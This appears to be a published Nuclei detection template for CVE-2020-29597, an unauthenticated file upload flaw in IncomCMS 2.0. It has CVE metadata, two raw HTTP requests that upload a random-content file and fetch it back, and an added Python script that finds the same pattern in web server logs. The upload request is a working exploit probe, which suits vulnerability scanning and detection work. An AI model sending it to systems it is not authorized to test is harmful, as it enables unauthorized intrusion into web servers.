IncomCMS 2.0 - Arbitrary File Upload
ID: CVE-2020-29597
Severity: critical
Author: princechaddha
Tags: cve,cve2020,incomcms,fileupload,intrusive,incomcms_project
Description
IncomCMS 2.0 has an insecure file upload vulnerability in modules/uploader/showcase/script.php. This allows unauthenticated attackers to upload files to the server.
YAML Source
id: CVE-2020-29597

info:
  name: IncomCMS 2.0 - Arbitrary File Upload
  author: princechaddha
  severity: critical
  description: |
    IncomCMS 2.0 has a an insecure file upload vulnerability in modules/uploader/showcase/script.php. This allows unauthenticated attackers to upload files into the server.
  impact: |
    Successful exploitation of this vulnerability can result in unauthorized access, data leakage, and potential remote code execution.
  remediation: |
    Apply the latest security patch or update to a version that addresses the vulnerability.
  reference:
    - https://github.com/Trhackno/CVE-2020-29597
    - https://nvd.nist.gov/vuln/detail/CVE-2020-29597
    - https://github.com/M4DM0e/m4dm0e.github.io/blob/gh-pages/_posts/2020-12-07-incom-insecure-up.md
    - https://m4dm0e.github.io/2020/12/07/incom-insecure-up.html
    - https://github.com/trhacknon/CVE-2020-29597
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-29597
    cwe-id: CWE-434
    epss-score: 0.78448
    epss-percentile: 0.9817
    cpe: cpe:2.3:a:incomcms_project:incomcms:2.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: incomcms_project
    product: incomcms
  tags: cve,cve2020,incomcms,fileupload,intrusive,incomcms_project

http:
  - raw:
      - |
        POST /incom/modules/uploader/showcase/script.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt

        ------WebKitFormBoundaryBEJZt0IK73M2mAbt
        Content-Disposition: form-data; name="Filedata"; filename="{{randstr_1}}.png"
        Content-Type: text/html

        {{randstr_2}}
        ------WebKitFormBoundaryBEJZt0IK73M2mAbt--
      - |
        GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - '{"status":"1","name":"{{randstr_1}}.png"}'

      - type: word
        part: body_2
        words:
          - '{{randstr_2}}'
# digest: 4b0a004830460221009b3c8840803b6bb5baa29820f6d8a5cf092262489feeb2488e6d4463f1b32794022100b9899039e4e7fc90203d5cc13f064b1efee4c5c8699d785a095e6bea6a2a8b09:922c64590222798bb761d5b6d8e72950
Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-29597.yaml"
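A log-side counterpart to the template's two requests, added here as an example (it is not part of the template or of the Nuclei project): it flags clients that POST successfully to the uploader script and then fetch a file from /upload/userfiles/image/. The combined log format, the five-minute correlation window and the sample log lines are assumptions.

```python
import re
from datetime import datetime, timedelta

UPLOAD_PATH = "/modules/uploader/showcase/script.php"  # path from the template's POST
SERVED_PREFIX = "/upload/userfiles/image/"             # path from the template's GET
WINDOW = timedelta(minutes=5)                           # assumption: correlation window

# Combined Log Format: ip ident user [time] "METHOD path PROTO" status size ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines (not taken from a real server).
SAMPLE_LOG = """\
203.0.113.7 - - [07/Dec/2020:10:00:01 +0000] "POST /incom/modules/uploader/showcase/script.php HTTP/1.1" 200 41 "-" "curl/7.68.0"
203.0.113.7 - - [07/Dec/2020:10:00:02 +0000] "GET /upload/userfiles/image/a1b2c3.png HTTP/1.1" 200 27 "-" "curl/7.68.0"
198.51.100.9 - - [07/Dec/2020:10:03:00 +0000] "GET /upload/userfiles/image/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [07/Dec/2020:11:00:00 +0000] "POST /incom/modules/uploader/showcase/script.php HTTP/1.1" 404 0 "-" "-"
"""

def find_upload_then_fetch(log_text, window=WINDOW):
    """Return (ip, upload_time, fetched_path) for each successful POST to the
    uploader that the same client follows with a 2xx GET of a stored file."""
    last_upload = {}  # ip -> time of that client's most recent successful upload
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        path = m["path"].split("?", 1)[0]  # ignore any query string
        ok = m["status"].startswith("2")
        if m["method"] == "POST" and path.endswith(UPLOAD_PATH) and ok:
            last_upload[m["ip"]] = ts
        elif m["method"] == "GET" and SERVED_PREFIX in path and ok:
            up = last_upload.get(m["ip"])
            if up is not None and timedelta(0) <= ts - up <= window:
                hits.append((m["ip"], up.isoformat(), path))
    return hits

if __name__ == "__main__":
    for ip, when, path in find_upload_then_fetch(SAMPLE_LOG):
        print(f"{ip} uploaded at {when}, then fetched {path}")
```

Any 2xx POST to the uploader path from a client without a session is worth reviewing on its own; the correlation with the follow-up GET only narrows the results to uploads that were confirmed retrievable.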